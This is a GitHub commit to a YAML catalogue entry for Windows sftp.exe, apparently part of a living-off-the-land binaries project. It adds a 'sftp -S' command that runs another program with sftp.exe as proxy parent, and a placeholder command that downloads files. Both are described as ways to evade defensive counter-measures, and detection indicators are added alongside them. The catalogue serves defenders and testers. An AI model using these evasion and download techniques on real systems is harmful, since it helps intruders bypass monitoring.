Update sftp.yml

* Added another way of using sftp for execution
* Added Download functionality
This commit is contained in:
C-h4ck-0 2022-11-14 13:45:59 +07:00 committed by GitHub
parent f3329c0d94
commit e803bc7635
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -11,10 +11,25 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
- Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost"
Description: Execute notepad.exe with sftp.exe as parent process
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
- Command: "sftp <ftp_user>@<ftp_Server_ip>:<path_of_file_to_download> <path_to_save_file>"
Description: Download file with sftp.exe from an FTP server
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session.
Category: Download
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path: Full_Path:
- Path: c:\windows\system32\OpenSSH\sftp.exe - Path: c:\windows\system32\OpenSSH\sftp.exe
Detection: Detection:
- IOC: sftp.exe spawning unexpected processes - IOC: sftp.exe spawning unexpected processes
- IOC: Suspicious sFTP internet/network traffic
Acknowledgement: Acknowledgement:
- Person: 'Nir Chako (Pentera)' - Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0' Handle: '@C_h4ck_0'